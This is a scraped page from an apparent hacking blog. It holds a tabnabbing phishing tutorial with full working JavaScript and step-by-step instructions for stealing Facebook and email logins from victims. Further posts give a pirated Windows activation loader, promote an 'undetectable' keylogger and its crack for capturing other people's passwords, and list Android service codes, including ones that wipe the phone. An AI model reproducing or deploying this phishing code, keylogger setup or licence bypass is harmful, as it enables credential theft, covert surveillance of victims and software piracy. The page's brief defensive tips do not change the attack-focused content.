Facebook, Email Tabnabbing

Hey friends, today i am going to How to Hack emails, social networking websites and other websites involving login information. The technique that i am going to teach you today is Advanced Tabnabbing. I have already explained what is basic tabnabbingtoday we will extend our knowledge base, i will explain things with practical example. So lets learn..

Advanced Tabnabbing Tutorial

I will explain this tutorial  using attack scenario and live example and how to protect yourself from such stuff.

Let consider a attack scenario:

1. A hacker say(me Lokesh) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)

2. I sends a copy of this web page to victim whose account or whatever i want to hack.

3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.

4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.

5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.

6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.

Here end's the attack scenario for advanced tabnabbing.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.  Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.

Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.

Follow below measure to protect yourself from Tabnabbing:

1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.

2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.

3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.

4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.

5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes: 

 <!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND (lokesh@hackingloops.com)
Website: http://www.hackingloops.com
Version:1.6
-->

<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
 BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Set FAVICON
if(REAL_FAVICON){
 var link = document.createElement('link');
 link.type = 'image/x-icon';
 link.rel = 'shortcut icon';
 link.href = REAL_FAVICON;
 document.getElementsByTagName('head')[0].appendChild(link);
}

//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
 el_tabnab.onblur = function(){
 TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
 }
 el_tabnab.onfocus= function(){
 if(TIMER) clearTimeout(TIMER);
 }
} else {
 setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
 if(SWITCHED == "false"){
 //Redirect the iframe to FAKE_PAGE_URL
 el_tabnab.src=FAKE_PAGE_URL;
 //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
 if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

 //Change the favicon -- This doesn't seem to work in IE
 if(BROWSER_TYPE != "Internet Explorer"){
 var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
 for (var i=0; i<links.length; i++) {
 var looplink = links[i];
 if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
 document.getElementsByTagName("head")[0].removeChild(looplink);
 }
 }
 var link = document.createElement("link");
 link.type = "image/x-icon";
 link.rel = "shortcut icon";
 link.href = FAKE_FAVICON;
 document.getElementsByTagName("head")[0].appendChild(link);
 }
 }
}
</script>

</body>
</html>

Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..

Check out my photos on Facebook

facebook Aman Kumar wants to share photos and updates with you. Aman has invited you to Facebook. After you sign up, you'll be able to stay connected with friends by sharing photos and videos, posting status updates, sending messages and more. View Aman's Photos This message was sent to darklord.aman.ultimatehacker@blogger.com. If you don't want to receive these emails from Facebook in the future or have your email address used for friend suggestions, please click: unsubscribe. Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303

How to activate Windows 7 or Vista for FREE

Hi Friends, today i will show you how to activate windows 7 or Windows vista for free. Its a 100% working hack and perfectly safe way to easily activate windows for free. I will explain this with the help of windows loader by daz. This loader application will bypass the Microsoft's WAT(windows activation technologies) and activate your winodws 7 or Vista in just few minutes.The application itself injects a SLIC (System Licensed Internal Code) into your system before Windows boots; that is what fools Windows into thinking it's genuine.

Activate Windows 7 or windows vista for free

Requirements:

1. Supported Operating System Installed( Windows 7 or Windows Vista).

2. Loader by Daz.

3. Internet connection to check the activation is happened correctly or not.

Steps to activate Windows 7 or Windows Vista:

1. Download the Windows Loader application.

(Click here to download) 

Password : www.isoftdl.com

2. Extract the zip file and now you will have four files.

3. Start the Loader.exe by double clicking on it.

4. Now Click on Install to install the SLIC and updating the windows key.

5. That's the only procedure, now just go to Microsoft's website to check your activation. Alternatively you can check it by right clicking on My Computer Icon on desktop and see the General information.

Note: You must be running build 7600 or greater for Windows 7 and Windows Server 2008 R2.
Note: I don't recommend using any of the Windows 7 E editions.
Note: Windows 7 N editions will only be supported when OEM SLP serials leak.

Features of Windows Activator Loader:

•Can be run as a standalone application
•Works well with all system languages
•Custom OEM information can be installed
•Argument support for silent installs
•Can be used for pre-activation
•Application integrity checking
•Custom error handling
•Support for hidden partitions and complex setups
•Can work alongside Linux's GRUB or any other boot manager
•Works with TrueCrypt and many other types of hard drive encryption applications
•Add your own certificates and serials externally
•Offers certificate and serial installation only for users with an existing SLIC 2.1
•Automated system profiling (The application matches everything up for you)

Supported operating systems
•Windows 7 Ultimate
•Windows 7 Ultimate E
•Windows 7 Professional
•Windows 7 Professional E
•Windows 7 Home Premium
•Windows 7 Home Premium E
•Windows 7 Home Basic
•Windows 7 Starter
•Windows 7 Starter E
•Windows Vista Ultimate
•Windows Vista Business
•Windows Vista Business N
•Windows Vista Home Premium
•Windows Vista Home Basic
•Windows Vista Home Basic N
•Windows Vista Starter
•Windows Server 2008 R2: Enterprise
•Windows Server 2008 R2: Standard
•Windows Server 2008 R2: Foundation
•Windows Server 2008: Enterprise
•Windows Server 2008: Standard
•Windows Server 2008: Foundation
•Windows Small Business Server 2008

Don't Forget to say thanks if it works for you.... I hope you all will love it...

Best Keylogger Software

Hello friends, today i am sharing with you the best keylogger software to hack email accounts or passwords and much more.  I only limitation of this keylogger is that you need to install it to victim server that means you  require physical access to the victims PC at least once. 

The keylogger that i have rated the best one from all available keylogger is Award Keylogger and why so, its not because of it's recording keys feature but because of its extensive features and ease of configuration and installation.

It not only monitors the key strokes and send them to email or FTP server but more than that it also captures the screen shot and biggest thing is that its 100% undetectable. None of the antivirus can detect it. What you need to hack email accounts and other website passwords of any victim is that is you need to install it to his system.

Hack email accounts or passwords using best keylogger

Introduction about Award Keylogger

Award Keylogger allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Award Keylogger makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones.

Main Features:
• New! Run keylogger as a Windows service
• Easy-to-use, even for beginners 
• Absolutely invisible/stealth mode
• Logs accounts and passwords typed in the every application
• Logs message typed in all instant messengers
• Visual surveillance, support screenshots view 
• Slide show for screenshots 
• Captures the contents behind the asterisks 
• Captures mouse clicks 
• Logs websites visited 
• Captures AOL/AIM/Yahoo/ICQ chats 
• Keyword Detection and Notification 
• Records contents of password protected web pages, including Web Mail messages 
• Logs Windows Clipboard 
• Sends log by e-mail 
• Uploads ALL logs into the separate folders by FTP 
• Invisible for the firewall program 
• Invisible in the Windows startup list 
• Monitors all users of the PC 
• User friendly HTML file format for emailed logs 
• Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List 
• Records Windows 9.x/Me/2000/XP/VISTA logon passwords 
• Intercepts DOS-box and Java-chat keystrokes 
• Supports international keyboards 
• External log viewer 
• Supports printing of the log 
• Optimized for Windows XP 
• Exports log to HTML

DOWNLOAD FULL VERSION OF AWARD KEYLOGGER(click on download text).

How to Install Full version?

1. The Zipped file contains two files.

2. Run the Installation file and then copy the patch into program files folder of award keylogger and then run it.

3. In patch files option select all files and then browse the award keylogger exe file and click on patch.

4. This will make the trial version to full and enjoy the full features of award keylogger.

Hope you all have liked it. If you need any help or have any queries ask me in form of comments.... 

Secret Hack Codes for Android Mobile Phones

Hello Friends, today i am going to share several secret hack codes for Android Mobile Phones .These android hack codes will help you to hackandroid mobiles and helpyou to explore more about your android Phone. Secret Hack codes are those codes which are usually hidden from users for any misuse and exploit. As we all know android is very new platform and thusvery few hack codes of androids are there on internet. Today i am sharingall the hack codes of androids cellphones thati know. And i surely hope you can't find codes better than that. So friends let's hack and explore our android Phones. I have tested these codes on my Phone Samsung Galaxy having an Android OS version 2.2 . I am sure these will work on all previous versions. Secret hacking codes for Android Mobile Phone Secret Hacking codes for Android Mobile Phones: 1. Complete Information About yourPhone *#*#4636#*#* This code can be used to get some interesting information about your phone and battery. It showsfollowing 4 menus on screen: *. Phone information *. Battery information *. Battery history *. Usage statistics 2. Factory data reset *#*#7780#*#* This code can be used for a factory data reset . It'll remove following things: *. Google account settings stored in your phone *. System and application data and settings *. Downloaded applications It'll NOT remove: *. Current system software and bundled application *. SD card files e.g. photos, music files, etc. Note: Once you give this code, you get a prompt screen asking you to click on "Reset phone" button. Soyou get a chance to cancel your operation. 3. Format Android Phone *2767*3855# Think before you give this code. This code is used for factory format . It'll remove all files and settings including the internal memory storage. It'llalso reinstall the phone firmware. Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code. 4. Phone Camera Update *#*#34971539#*#* This code is used to get information about phone camera. It shows following 4menus: *. Update camera firmware inimage (Don't try this option) *. Update camera firmware inSD card *. Get camera firmware version *. Get firmware update count WARNING: Never use the first option otherwise your phone camera will stop working and you'll need to take your phone to service center to reinstall camera firmware. 5. End Call/Power *#*#7594#*#* This one is my favorite one.This code can be used to change the " End Call / Power " button action in your phone. Be default, if you long press the button, it shows a screen asking you to select any option from Silent mode, AirPlane mode and Power off. You can change this action using this code. You can enable direct power off on this button so you don't need to waste your time in selecting the option. 6. File Copy for Creating Backup *#*#273283*255*663282*#*#* This code opens a File copyscreen where you can backup your media files e.g.Images, Sound, Video and Voice memo. 7. Service Mode *#*#197328640#*#* This code can be used to enter into Service mode. You can run various tests and change settings in the service mode. 8. WLAN, GPS and Bluetooth Test Codes: *#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* - WLANtest (Use "Menu" button to start various tests) *#*#232338#*#* - Shows WiFi MAC address *#*#1472365#*#* -GPS test *#*#1575#*#* - Another GPS test *#*#232331#*#* - Bluetooth test *#*#232337#*# - Shows Bluetooth device address 9. Codes to get Firmware version information: *#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate *#*#1234#*#* - PDA and Phone *#*#1111#*#* - FTASW Version *#*#2222#*#* - FTAHW Version *#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number 10. Codes to launch various Factory Tests: *#*#0283#*#* - Packet Loopback *#*#0*#*#* - LCD test *#*#0673#*#* OR *#*#0289#*#* - Melody test *#*#0842#*#* - Device test (Vibration test and BackLight test) *#*#2663#*#* - Touch screen version *#*#2664#*#* - Touch screen test *#*#0588#*#* - Proximity sensor test *#*#3264#*#* - RAMversion I hope you all have enjoyed these hack codes for android mobile phones.. I just loved them, If you haveany issues ask me in form of comments. If you like my posts please comment as they motivates me to post more.